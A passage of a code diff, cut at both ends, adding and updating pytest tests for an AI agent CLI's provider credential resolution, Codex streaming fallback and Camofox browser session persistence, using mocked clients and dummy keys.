def __init__(self, http_closed: bool):
|
||||
self._client = SimpleNamespace(is_closed=http_closed)
|
||||
|
||||
assert AIAgent._is_openai_client_closed(ClientWithHttpClient(http_closed=False)) is False
|
||||
assert AIAgent._is_openai_client_closed(ClientWithHttpClient(http_closed=True)) is True
|
||||
|
||||
|
||||
class TestAnthropicBaseUrlPassthrough:
|
||||
"""Bug fix: base_url was filtered with 'anthropic in base_url', blocking proxies."""
|
||||
|
||||
|
|
|
|||
|
|
@ -1,6 +1,123 @@
|
|||
from hermes_cli import runtime_provider as rp
|
||||
|
||||
|
||||
def test_resolve_runtime_provider_uses_credential_pool(monkeypatch):
|
||||
class _Entry:
|
||||
access_token = "pool-token"
|
||||
source = "manual"
|
||||
base_url = "https://chatgpt.com/backend-api/codex"
|
||||
|
||||
class _Pool:
|
||||
def has_credentials(self):
|
||||
return True
|
||||
|
||||
def select(self):
|
||||
return _Entry()
|
||||
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openai-codex")
|
||||
monkeypatch.setattr(rp, "load_pool", lambda provider: _Pool())
|
||||
|
||||
resolved = rp.resolve_runtime_provider(requested="openai-codex")
|
||||
|
||||
assert resolved["provider"] == "openai-codex"
|
||||
assert resolved["api_key"] == "pool-token"
|
||||
assert resolved["credential_pool"] is not None
|
||||
assert resolved["source"] == "manual"
|
||||
|
||||
|
||||
def test_resolve_runtime_provider_anthropic_pool_respects_config_base_url(monkeypatch):
|
||||
class _Entry:
|
||||
access_token = "pool-token"
|
||||
source = "manual"
|
||||
base_url = "https://api.anthropic.com"
|
||||
|
||||
class _Pool:
|
||||
def has_credentials(self):
|
||||
return True
|
||||
|
||||
def select(self):
|
||||
return _Entry()
|
||||
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "anthropic")
|
||||
monkeypatch.setattr(
|
||||
rp,
|
||||
"_get_model_config",
|
||||
lambda: {
|
||||
"provider": "anthropic",
|
||||
"base_url": "https://proxy.example.com/anthropic",
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(rp, "load_pool", lambda provider: _Pool())
|
||||
|
||||
resolved = rp.resolve_runtime_provider(requested="anthropic")
|
||||
|
||||
assert resolved["provider"] == "anthropic"
|
||||
assert resolved["api_mode"] == "anthropic_messages"
|
||||
assert resolved["api_key"] == "pool-token"
|
||||
assert resolved["base_url"] == "https://proxy.example.com/anthropic"
|
||||
|
||||
|
||||
def test_resolve_runtime_provider_anthropic_explicit_override_skips_pool(monkeypatch):
|
||||
def _unexpected_pool(provider):
|
||||
raise AssertionError(f"load_pool should not be called for {provider}")
|
||||
|
||||
def _unexpected_anthropic_token():
|
||||
raise AssertionError("resolve_anthropic_token should not be called")
|
||||
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "anthropic")
|
||||
monkeypatch.setattr(
|
||||
rp,
|
||||
"_get_model_config",
|
||||
lambda: {
|
||||
"provider": "anthropic",
|
||||
"base_url": "https://config.example.com/anthropic",
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(rp, "load_pool", _unexpected_pool)
|
||||
monkeypatch.setattr(
|
||||
"agent.anthropic_adapter.resolve_anthropic_token",
|
||||
_unexpected_anthropic_token,
|
||||
)
|
||||
|
||||
resolved = rp.resolve_runtime_provider(
|
||||
requested="anthropic",
|
||||
explicit_api_key="anthropic-explicit-token",
|
||||
explicit_base_url="https://proxy.example.com/anthropic/",
|
||||
)
|
||||
|
||||
assert resolved["provider"] == "anthropic"
|
||||
assert resolved["api_mode"] == "anthropic_messages"
|
||||
assert resolved["api_key"] == "anthropic-explicit-token"
|
||||
assert resolved["base_url"] == "https://proxy.example.com/anthropic"
|
||||
assert resolved["source"] == "explicit"
|
||||
assert resolved.get("credential_pool") is None
|
||||
|
||||
|
||||
def test_resolve_runtime_provider_falls_back_when_pool_empty(monkeypatch):
|
||||
class _Pool:
|
||||
def has_credentials(self):
|
||||
return False
|
||||
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openai-codex")
|
||||
monkeypatch.setattr(rp, "load_pool", lambda provider: _Pool())
|
||||
monkeypatch.setattr(
|
||||
rp,
|
||||
"resolve_codex_runtime_credentials",
|
||||
lambda: {
|
||||
"provider": "openai-codex",
|
||||
"base_url": "https://chatgpt.com/backend-api/codex",
|
||||
"api_key": "codex-token",
|
||||
"source": "hermes-auth-store",
|
||||
"last_refresh": "2026-02-26T00:00:00Z",
|
||||
},
|
||||
)
|
||||
|
||||
resolved = rp.resolve_runtime_provider(requested="openai-codex")
|
||||
|
||||
assert resolved["api_key"] == "codex-token"
|
||||
assert resolved.get("credential_pool") is None
|
||||
|
||||
|
||||
def test_resolve_runtime_provider_codex(monkeypatch):
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openai-codex")
|
||||
monkeypatch.setattr(
|
||||
|
|
@ -40,6 +157,36 @@ def test_resolve_runtime_provider_ai_gateway(monkeypatch):
|
|||
assert resolved["requested_provider"] == "ai-gateway"
|
||||
|
||||
|
||||
def test_resolve_runtime_provider_ai_gateway_explicit_override_skips_pool(monkeypatch):
|
||||
def _unexpected_pool(provider):
|
||||
raise AssertionError(f"load_pool should not be called for {provider}")
|
||||
|
||||
def _unexpected_provider_resolution(provider):
|
||||
raise AssertionError(f"resolve_api_key_provider_credentials should not be called for {provider}")
|
||||
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "ai-gateway")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {})
|
||||
monkeypatch.setattr(rp, "load_pool", _unexpected_pool)
|
||||
monkeypatch.setattr(
|
||||
rp,
|
||||
"resolve_api_key_provider_credentials",
|
||||
_unexpected_provider_resolution,
|
||||
)
|
||||
|
||||
resolved = rp.resolve_runtime_provider(
|
||||
requested="ai-gateway",
|
||||
explicit_api_key="ai-gateway-explicit-token",
|
||||
explicit_base_url="https://proxy.example.com/v1/",
|
||||
)
|
||||
|
||||
assert resolved["provider"] == "ai-gateway"
|
||||
assert resolved["api_mode"] == "chat_completions"
|
||||
assert resolved["api_key"] == "ai-gateway-explicit-token"
|
||||
assert resolved["base_url"] == "https://proxy.example.com/v1"
|
||||
assert resolved["source"] == "explicit"
|
||||
assert resolved.get("credential_pool") is None
|
||||
|
||||
|
||||
def test_resolve_runtime_provider_openrouter_explicit(monkeypatch):
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openrouter")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {})
|
||||
|
|
@ -61,6 +208,69 @@ def test_resolve_runtime_provider_openrouter_explicit(monkeypatch):
|
|||
assert resolved["source"] == "explicit"
|
||||
|
||||
|
||||
def test_resolve_runtime_provider_auto_uses_openrouter_pool(monkeypatch):
|
||||
class _Entry:
|
||||
access_token = "pool-key"
|
||||
source = "manual"
|
||||
base_url = "https://openrouter.ai/api/v1"
|
||||
|
||||
class _Pool:
|
||||
def has_credentials(self):
|
||||
return True
|
||||
|
||||
def select(self):
|
||||
return _Entry()
|
||||
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openrouter")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {})
|
||||
monkeypatch.setattr(rp, "load_pool", lambda provider: _Pool())
|
||||
monkeypatch.delenv("OPENAI_BASE_URL", raising=False)
|
||||
monkeypatch.delenv("OPENROUTER_BASE_URL", raising=False)
|
||||
monkeypatch.delenv("OPENAI_API_KEY", raising=False)
|
||||
monkeypatch.delenv("OPENROUTER_API_KEY", raising=False)
|
||||
|
||||
resolved = rp.resolve_runtime_provider(requested="auto")
|
||||
|
||||
assert resolved["provider"] == "openrouter"
|
||||
assert resolved["api_key"] == "pool-key"
|
||||
assert resolved["base_url"] == "https://openrouter.ai/api/v1"
|
||||
assert resolved["source"] == "manual"
|
||||
assert resolved.get("credential_pool") is not None
|
||||
|
||||
|
||||
def test_resolve_runtime_provider_openrouter_explicit_api_key_skips_pool(monkeypatch):
|
||||
class _Entry:
|
||||
access_token = "pool-key"
|
||||
source = "manual"
|
||||
base_url = "https://openrouter.ai/api/v1"
|
||||
|
||||
class _Pool:
|
||||
def has_credentials(self):
|
||||
return True
|
||||
|
||||
def select(self):
|
||||
return _Entry()
|
||||
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openrouter")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {})
|
||||
monkeypatch.setattr(rp, "load_pool", lambda provider: _Pool())
|
||||
monkeypatch.delenv("OPENAI_BASE_URL", raising=False)
|
||||
monkeypatch.delenv("OPENROUTER_BASE_URL", raising=False)
|
||||
monkeypatch.delenv("OPENAI_API_KEY", raising=False)
|
||||
monkeypatch.delenv("OPENROUTER_API_KEY", raising=False)
|
||||
|
||||
resolved = rp.resolve_runtime_provider(
|
||||
requested="openrouter",
|
||||
explicit_api_key="explicit-key",
|
||||
)
|
||||
|
||||
assert resolved["provider"] == "openrouter"
|
||||
assert resolved["api_key"] == "explicit-key"
|
||||
assert resolved["base_url"] == rp.OPENROUTER_BASE_URL
|
||||
assert resolved["source"] == "explicit"
|
||||
assert resolved.get("credential_pool") is None
|
||||
|
||||
|
||||
def test_resolve_runtime_provider_openrouter_ignores_codex_config_base_url(monkeypatch):
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openrouter")
|
||||
monkeypatch.setattr(
|
||||
|
|
@ -136,16 +346,19 @@ def test_openai_key_used_when_no_openrouter_key(monkeypatch):
|
|||
|
||||
|
||||
def test_custom_endpoint_prefers_openai_key(monkeypatch):
|
||||
"""Custom endpoint should use OPENAI_API_KEY, not OPENROUTER_API_KEY.
|
||||
"""Custom endpoint should use config api_key over OPENROUTER_API_KEY.
|
||||
|
||||
Regression test for #560: when base_url is a non-OpenRouter endpoint,
|
||||
OPENROUTER_API_KEY was being sent as the auth header instead of OPENAI_API_KEY.
|
||||
Updated for #4165: config.yaml is now the source of truth for endpoint URLs,
|
||||
OPENAI_BASE_URL env var is no longer consulted.
|
||||
"""
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openrouter")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {})
|
||||
monkeypatch.setenv("OPENAI_BASE_URL", "https://api.z.ai/api/coding/paas/v4")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {
|
||||
"provider": "custom",
|
||||
"base_url": "https://api.z.ai/api/coding/paas/v4",
|
||||
"api_key": "zai-key",
|
||||
})
|
||||
monkeypatch.delenv("OPENAI_BASE_URL", raising=False)
|
||||
monkeypatch.delenv("OPENROUTER_BASE_URL", raising=False)
|
||||
monkeypatch.setenv("OPENAI_API_KEY", "zai-key")
|
||||
monkeypatch.setenv("OPENROUTER_API_KEY", "openrouter-key")
|
||||
|
||||
resolved = rp.resolve_runtime_provider(requested="custom")
|
||||
|
|
@ -221,19 +434,22 @@ def test_custom_endpoint_uses_config_api_field_when_no_api_key(monkeypatch):
|
|||
assert resolved["api_key"] == "config-api-field"
|
||||
|
||||
|
||||
def test_custom_endpoint_auto_provider_prefers_openai_key(monkeypatch):
|
||||
"""Auto provider with non-OpenRouter base_url should prefer OPENAI_API_KEY.
|
||||
def test_custom_endpoint_explicit_custom_prefers_config_key(monkeypatch):
|
||||
"""Explicit 'custom' provider with config base_url+api_key should use them.
|
||||
|
||||
Same as #560 but via 'hermes model' flow which sets provider to 'auto'.
|
||||
Updated for #4165: config.yaml is the source of truth, not OPENAI_BASE_URL.
|
||||
"""
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openrouter")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {})
|
||||
monkeypatch.setenv("OPENAI_BASE_URL", "https://my-vllm-server.example.com/v1")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {
|
||||
"provider": "custom",
|
||||
"base_url": "https://my-vllm-server.example.com/v1",
|
||||
"api_key": "sk-vllm-key",
|
||||
})
|
||||
monkeypatch.delenv("OPENAI_BASE_URL", raising=False)
|
||||
monkeypatch.delenv("OPENROUTER_BASE_URL", raising=False)
|
||||
monkeypatch.setenv("OPENAI_API_KEY", "sk-vllm-key")
|
||||
monkeypatch.setenv("OPENROUTER_API_KEY", "sk-or-...leak")
|
||||
|
||||
resolved = rp.resolve_runtime_provider(requested="auto")
|
||||
resolved = rp.resolve_runtime_provider(requested="custom")
|
||||
|
||||
assert resolved["base_url"] == "https://my-vllm-server.example.com/v1"
|
||||
assert resolved["api_key"] == "sk-vllm-key"
|
||||
|
|
@ -359,6 +575,36 @@ def test_explicit_openrouter_skips_openai_base_url(monkeypatch):
|
|||
assert resolved["api_key"] == "or-test-key"
|
||||
|
||||
|
||||
def test_explicit_openrouter_honors_openrouter_base_url_over_pool(monkeypatch):
|
||||
class _Entry:
|
||||
access_token = "pool-key"
|
||||
source = "manual"
|
||||
base_url = "https://openrouter.ai/api/v1"
|
||||
|
||||
class _Pool:
|
||||
def has_credentials(self):
|
||||
return True
|
||||
|
||||
def select(self):
|
||||
return _Entry()
|
||||
|
||||
monkeypatch.setattr(rp, "resolve_provider", lambda *a, **k: "openrouter")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {})
|
||||
monkeypatch.setattr(rp, "load_pool", lambda provider: _Pool())
|
||||
monkeypatch.setenv("OPENROUTER_BASE_URL", "https://mirror.example.com/v1")
|
||||
monkeypatch.setenv("OPENROUTER_API_KEY", "mirror-key")
|
||||
monkeypatch.delenv("OPENAI_BASE_URL", raising=False)
|
||||
monkeypatch.delenv("OPENAI_API_KEY", raising=False)
|
||||
|
||||
resolved = rp.resolve_runtime_provider(requested="openrouter")
|
||||
|
||||
assert resolved["provider"] == "openrouter"
|
||||
assert resolved["base_url"] == "https://mirror.example.com/v1"
|
||||
assert resolved["api_key"] == "mirror-key"
|
||||
assert resolved["source"] == "env/config"
|
||||
assert resolved.get("credential_pool") is None
|
||||
|
||||
|
||||
def test_resolve_requested_provider_precedence(monkeypatch):
|
||||
monkeypatch.setenv("HERMES_INFERENCE_PROVIDER", "nous")
|
||||
monkeypatch.setattr(rp, "_get_model_config", lambda: {"provider": "openai-codex"})
|
||||
|
|
@ -545,7 +791,7 @@ def test_alibaba_default_coding_intl_endpoint_uses_chat_completions(monkeypatch)
|
|||
|
||||
assert resolved["provider"] == "alibaba"
|
||||
assert resolved["api_mode"] == "chat_completions"
|
||||
assert resolved["base_url"] == "https://coding-intl.dashscope.aliyuncs.com/v1"
|
||||
assert resolved["base_url"] == "https://dashscope-intl.aliyuncs.com/compatible-mode/v1"
|
||||
|
||||
|
||||
def test_alibaba_anthropic_endpoint_override_uses_anthropic_messages(monkeypatch):
|
||||
|
|
|
|||
|
|
@ -32,8 +32,8 @@ class TestSetupProviderModelSelection:
|
|||
@pytest.mark.parametrize("provider_id,expected_defaults", [
|
||||
("zai", ["glm-5", "glm-4.7", "glm-4.5", "glm-4.5-flash"]),
|
||||
("kimi-coding", ["kimi-k2.5", "kimi-k2-thinking", "kimi-k2-turbo-preview"]),
|
||||
("minimax", ["MiniMax-M2.5", "MiniMax-M2.5-highspeed", "MiniMax-M2.1"]),
|
||||
("minimax-cn", ["MiniMax-M2.5", "MiniMax-M2.5-highspeed", "MiniMax-M2.1"]),
|
||||
("minimax", ["MiniMax-M2.7", "MiniMax-M2.7-highspeed", "MiniMax-M2.5", "MiniMax-M2.5-highspeed", "MiniMax-M2.1"]),
|
||||
("minimax-cn", ["MiniMax-M2.7", "MiniMax-M2.7-highspeed", "MiniMax-M2.5", "MiniMax-M2.5-highspeed", "MiniMax-M2.1"]),
|
||||
])
|
||||
@patch("hermes_cli.models.fetch_api_models", return_value=[])
|
||||
@patch("hermes_cli.config.get_env_value", return_value="fake-key")
|
||||
|
|
|
|||
|
|
@ -782,3 +782,35 @@ class TestCodexStreamCallbacks:
|
|||
|
||||
response = agent._run_codex_stream({}, client=mock_client)
|
||||
assert "Hello from Codex!" in deltas
|
||||
|
||||
def test_codex_remote_protocol_error_falls_back_to_create_stream(self):
|
||||
from run_agent import AIAgent
|
||||
import httpx
|
||||
|
||||
fallback_response = SimpleNamespace(
|
||||
output=[SimpleNamespace(
|
||||
type="message",
|
||||
content=[SimpleNamespace(type="output_text", text="fallback from create stream")],
|
||||
)],
|
||||
status="completed",
|
||||
)
|
||||
|
||||
mock_client = MagicMock()
|
||||
mock_client.responses.stream.side_effect = httpx.RemoteProtocolError(
|
||||
"peer closed connection without sending complete message body"
|
||||
)
|
||||
|
||||
agent = AIAgent(
|
||||
model="test/model",
|
||||
quiet_mode=True,
|
||||
skip_context_files=True,
|
||||
skip_memory=True,
|
||||
)
|
||||
agent.api_mode = "codex_responses"
|
||||
agent._interrupt_requested = False
|
||||
|
||||
with patch.object(agent, "_run_codex_create_stream_fallback", return_value=fallback_response) as mock_fallback:
|
||||
response = agent._run_codex_stream({}, client=mock_client)
|
||||
|
||||
assert response is fallback_response
|
||||
mock_fallback.assert_called_once_with({}, client=mock_client)
|
||||
|
|
|
|||
|
|
@ -405,12 +405,13 @@ class TestGenerateSummary:
|
|||
@pytest.mark.asyncio
|
||||
async def test_generate_summary_async_handles_none_content(self):
|
||||
tc = _make_compressor()
|
||||
tc.async_client = MagicMock()
|
||||
tc.async_client.chat.completions.create = AsyncMock(
|
||||
mock_client = MagicMock()
|
||||
mock_client.chat.completions.create = AsyncMock(
|
||||
return_value=SimpleNamespace(
|
||||
choices=[SimpleNamespace(message=SimpleNamespace(content=None))]
|
||||
)
|
||||
)
|
||||
tc._get_async_client = MagicMock(return_value=mock_client)
|
||||
metrics = TrajectoryMetrics()
|
||||
|
||||
summary = await tc._generate_summary_async("Turn content", metrics)
|
||||
|
|
|
|||
|
|
@ -235,8 +235,13 @@ class TestCamofoxGetImages:
|
|||
mock_post.return_value = _mock_response(json_data={"tabId": "tab10", "url": "https://x.com"})
|
||||
camofox_navigate("https://x.com", task_id="t10")
|
||||
|
||||
# camofox_get_images parses images from the accessibility tree snapshot
|
||||
snapshot_text = (
|
||||
'- img "Logo"\n'
|
||||
' /url: https://x.com/img.png\n'
|
||||
)
|
||||
mock_get.return_value = _mock_response(json_data={
|
||||
"images": [{"src": "https://x.com/img.png", "alt": "Logo"}],
|
||||
"snapshot": snapshot_text,
|
||||
})
|
||||
result = json.loads(camofox_get_images(task_id="t10"))
|
||||
assert result["success"] is True
|
||||
|
|
|
|||
242
tests/tools/test_browser_camofox_persistence.py
Normal file
242
tests/tools/test_browser_camofox_persistence.py
Normal file
|
|
@ -0,0 +1,242 @@
|
|||
"""Persistence tests for the Camofox browser backend.
|
||||
|
||||
Tests that managed persistence uses stable identity while default mode
|
||||
uses random identity. The actual browser profile persistence is handled
|
||||
by the Camofox server (when CAMOFOX_PROFILE_DIR is set).
|
||||
"""
|
||||
|
||||
import json
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from tools.browser_camofox import (
|
||||
_drop_session,
|
||||
_get_session,
|
||||
_managed_persistence_enabled,
|
||||
camofox_close,
|
||||
camofox_navigate,
|
||||
check_camofox_available,
|
||||
cleanup_all_camofox_sessions,
|
||||
get_vnc_url,
|
||||
)
|
||||
from tools.browser_camofox_state import get_camofox_identity
|
||||
|
||||
|
||||
def _mock_response(status=200, json_data=None):
|
||||
resp = MagicMock()
|
||||
resp.status_code = status
|
||||
resp.json.return_value = json_data or {}
|
||||
resp.raise_for_status = MagicMock()
|
||||
return resp
|
||||
|
||||
|
||||
def _enable_persistence():
|
||||
"""Return a patch context that enables managed persistence via config."""
|
||||
config = {"browser": {"camofox": {"managed_persistence": True}}}
|
||||
return patch("tools.browser_camofox.load_config", return_value=config)
|
||||
|
||||
|
||||
@pytest.fixture(autouse=True)
|
||||
def _clear_session_state():
|
||||
import tools.browser_camofox as mod
|
||||
yield
|
||||
with mod._sessions_lock:
|
||||
mod._sessions.clear()
|
||||
mod._vnc_url = None
|
||||
mod._vnc_url_checked = False
|
||||
|
||||
|
||||
class TestManagedPersistenceToggle:
|
||||
def test_disabled_by_default(self):
|
||||
config = {"browser": {"camofox": {"managed_persistence": False}}}
|
||||
with patch("tools.browser_camofox.load_config", return_value=config):
|
||||
assert _managed_persistence_enabled() is False
|
||||
|
||||
def test_enabled_via_config_yaml(self):
|
||||
config = {"browser": {"camofox": {"managed_persistence": True}}}
|
||||
with patch("tools.browser_camofox.load_config", return_value=config):
|
||||
assert _managed_persistence_enabled() is True
|
||||
|
||||
def test_disabled_when_key_missing(self):
|
||||
config = {"browser": {}}
|
||||
with patch("tools.browser_camofox.load_config", return_value=config):
|
||||
assert _managed_persistence_enabled() is False
|
||||
|
||||
def test_disabled_on_config_load_error(self):
|
||||
with patch("tools.browser_camofox.load_config", side_effect=Exception("fail")):
|
||||
assert _managed_persistence_enabled() is False
|
||||
|
||||
|
||||
class TestEphemeralMode:
|
||||
"""Default behavior: random userId, no persistence."""
|
||||
|
||||
def test_session_gets_random_user_id(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
session = _get_session("task-1")
|
||||
assert session["user_id"].startswith("hermes_")
|
||||
assert session["managed"] is False
|
||||
|
||||
def test_different_tasks_get_different_user_ids(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
s1 = _get_session("task-1")
|
||||
s2 = _get_session("task-2")
|
||||
assert s1["user_id"] != s2["user_id"]
|
||||
|
||||
def test_session_reuse_within_same_task(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
s1 = _get_session("task-1")
|
||||
s2 = _get_session("task-1")
|
||||
assert s1 is s2
|
||||
|
||||
|
||||
class TestManagedPersistenceMode:
|
||||
"""With managed_persistence: stable userId derived from Hermes profile."""
|
||||
|
||||
def test_session_gets_stable_user_id(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
with _enable_persistence():
|
||||
session = _get_session("task-1")
|
||||
expected = get_camofox_identity("task-1")
|
||||
assert session["user_id"] == expected["user_id"]
|
||||
assert session["session_key"] == expected["session_key"]
|
||||
assert session["managed"] is True
|
||||
|
||||
def test_same_user_id_after_session_drop(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
with _enable_persistence():
|
||||
s1 = _get_session("task-1")
|
||||
uid1 = s1["user_id"]
|
||||
_drop_session("task-1")
|
||||
s2 = _get_session("task-1")
|
||||
assert s2["user_id"] == uid1
|
||||
|
||||
def test_same_user_id_across_tasks(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
with _enable_persistence():
|
||||
s1 = _get_session("task-a")
|
||||
s2 = _get_session("task-b")
|
||||
# Same profile = same userId, different session keys
|
||||
assert s1["user_id"] == s2["user_id"]
|
||||
assert s1["session_key"] != s2["session_key"]
|
||||
|
||||
def test_different_profiles_get_different_user_ids(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
with _enable_persistence():
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "profile-a"))
|
||||
s1 = _get_session("task-1")
|
||||
uid_a = s1["user_id"]
|
||||
_drop_session("task-1")
|
||||
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path / "profile-b"))
|
||||
s2 = _get_session("task-1")
|
||||
assert s2["user_id"] != uid_a
|
||||
|
||||
def test_navigate_uses_stable_identity(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
requests_seen = []
|
||||
|
||||
def _capture_post(url, json=None, timeout=None):
|
||||
requests_seen.append(json)
|
||||
return _mock_response(
|
||||
json_data={"tabId": "tab-1", "url": "https://example.com"}
|
||||
)
|
||||
|
||||
with _enable_persistence(), \
|
||||
patch("tools.browser_camofox.requests.post", side_effect=_capture_post):
|
||||
result = json.loads(camofox_navigate("https://example.com", task_id="task-1"))
|
||||
|
||||
assert result["success"] is True
|
||||
expected = get_camofox_identity("task-1")
|
||||
assert requests_seen[0]["userId"] == expected["user_id"]
|
||||
|
||||
def test_navigate_reuses_identity_after_close(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
|
||||
requests_seen = []
|
||||
|
||||
def _capture_post(url, json=None, timeout=None):
|
||||
requests_seen.append(json)
|
||||
return _mock_response(
|
||||
json_data={"tabId": f"tab-{len(requests_seen)}", "url": "https://example.com"}
|
||||
)
|
||||
|
||||
with (
|
||||
_enable_persistence(),
|
||||
patch("tools.browser_camofox.requests.post", side_effect=_capture_post),
|
||||
patch("tools.browser_camofox.requests.delete", return_value=_mock_response()),
|
||||
):
|
||||
first = json.loads(camofox_navigate("https://example.com", task_id="task-1"))
|
||||
camofox_close("task-1")
|
||||
second = json.loads(camofox_navigate("https://example.com", task_id="task-1"))
|
||||
|
||||
assert first["success"] is True
|
||||
assert second["success"] is True
|
||||
tab_requests = [req for req in requests_seen if "userId" in req]
|
||||
assert len(tab_requests) == 2
|
||||
assert tab_requests[0]["userId"] == tab_requests[1]["userId"]
|
||||
|
||||
|
||||
class TestVncUrlDiscovery:
|
||||
"""VNC URL is derived from the Camofox health endpoint."""
|
||||
|
||||
def test_vnc_url_from_health_port(self, monkeypatch):
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://myhost:9377")
|
||||
health_resp = _mock_response(json_data={"ok": True, "vncPort": 6080})
|
||||
with patch("tools.browser_camofox.requests.get", return_value=health_resp):
|
||||
assert check_camofox_available() is True
|
||||
assert get_vnc_url() == "http://myhost:6080"
|
||||
|
||||
def test_vnc_url_none_when_headless(self, monkeypatch):
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
health_resp = _mock_response(json_data={"ok": True})
|
||||
with patch("tools.browser_camofox.requests.get", return_value=health_resp):
|
||||
check_camofox_available()
|
||||
assert get_vnc_url() is None
|
||||
|
||||
def test_vnc_url_rejects_invalid_port(self, monkeypatch):
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
health_resp = _mock_response(json_data={"ok": True, "vncPort": "bad"})
|
||||
with patch("tools.browser_camofox.requests.get", return_value=health_resp):
|
||||
check_camofox_available()
|
||||
assert get_vnc_url() is None
|
||||
|
||||
def test_vnc_url_only_probed_once(self, monkeypatch):
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
health_resp = _mock_response(json_data={"ok": True, "vncPort": 6080})
|
||||
with patch("tools.browser_camofox.requests.get", return_value=health_resp) as mock_get:
|
||||
check_camofox_available()
|
||||
check_camofox_available()
|
||||
# Second call still hits /health for availability but doesn't re-parse vncPort
|
||||
assert get_vnc_url() == "http://localhost:6080"
|
||||
|
||||
def test_navigate_includes_vnc_hint(self, tmp_path, monkeypatch):
|
||||
monkeypatch.setenv("HERMES_HOME", str(tmp_path))
|
||||
monkeypatch.setenv("CAMOFOX_URL", "http://localhost:9377")
|
||||
import tools.browser_camofox as mod
|
||||
mod._vnc_url = "http://localhost:6080"
|
||||
mod._vnc_url_checked = True
|
||||
|
||||
with patch("tools.browser_camofox.requests.post", return_value=_mock_response(
|
||||
json_data={"tabId": "t1", "url": "https://example.com"}
|
||||
)):
|
||||
result = json.loads(camofox_navigate("https://example.com", task_id="vnc-test"))
|
||||
|
||||
assert result["vnc_url"] == "http://localhost:6080"
|
||||
assert "vnc_hint" in result
|
||||
66
tests/tools/test_browser_camofox_state.py
Normal file
66
tests/tools/test_browser_camofox_state.py
Normal file
|
|
@ -0,0 +1,66 @@
|
|||
"""Tests for Hermes-managed Camofox state helpers."""
|
||||
|
||||
from unittest.mock import patch
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
def _load_module():
|
||||
from tools import browser_camofox_state as state
|
||||
return state
|
||||
|
||||
|
||||
class TestCamofoxStatePaths:
|
||||
def test_paths_are_profile_scoped(self, tmp_path):
|
||||
state = _load_module()
|
||||
with patch.object(state, "get_hermes_home", return_value=tmp_path):
|
||||
assert state.get_camofox_state_dir() == tmp_path / "browser_auth" / "camofox"
|
||||
|
||||
|
||||
class TestCamofoxIdentity:
|
||||
def test_identity_is_deterministic(self, tmp_path):
|
||||
state = _load_module()
|
||||
with patch.object(state, "get_hermes_home", return_value=tmp_path):
|
||||
first = state.get_camofox_identity("task-1")
|
||||
second = state.get_camofox_identity("task-1")
|
||||
assert first == second
|
||||
|
||||
def test_identity_differs_by_task(self, tmp_path):
|
||||
state = _load_module()
|
||||
with patch.object(state, "get_hermes_home", return_value=tmp_path):
|
||||
a = state.get_camofox_identity("task-a")
|
||||
b = state.get_camofox_identity("task-b")
|
||||
# Same user (same profile), different session keys
|
||||
assert a["user_id"] == b["user_id"]
|
||||
assert a["session_key"] != b["session_key"]
|
||||
|
||||
def test_identity_differs_by_profile(self, tmp_path):
|
||||
state = _load_module()
|
||||
